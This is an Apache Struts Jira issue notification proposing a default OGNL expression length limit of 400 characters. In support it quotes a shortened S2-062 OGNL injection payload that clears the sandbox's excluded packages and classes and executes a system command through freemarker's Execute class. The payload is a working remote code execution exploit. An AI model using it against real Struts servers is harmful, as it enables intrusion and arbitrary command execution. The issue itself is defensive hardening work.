tanli created WW-5179:
-------------------------
Summary: struts.ognl.expressionMaxLength default set 400
Key: WW-5179
URL: https://issues.apache.org/jira/browse/WW-5179
Project: Struts 2
Issue Type: Improvement
Components: Core
Affects Versions: 2.6
Reporter: tanli
struts.ognl.expressionMaxLength
default set 400
i reduce the st062 exp
%\{(#request.a=#@org.apache.commons.collections.BeanMap@{})+
(#request.a.setBean(#request.get('struts.valueStack'))==true)+
(#request.b=#@org.apache.commons.collections.BeanMap@{})+
(#request.b.setBean(#request.get('a').get('context'))==true)+
(#request.c=#@org.apache.commons.collections.BeanMap@{})+
(#request.c.setBean(#request.get('b').get('memberAccess'))==true)+
(#request.get('c').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#request.get('c').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet())==true)+
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec(\{'calc'}))}
it's length is 709, so we default set ognl expression length is 400 could
protect our app safe.
--
This message was sent by Atlassian Jira
(v8.20.7#820007)
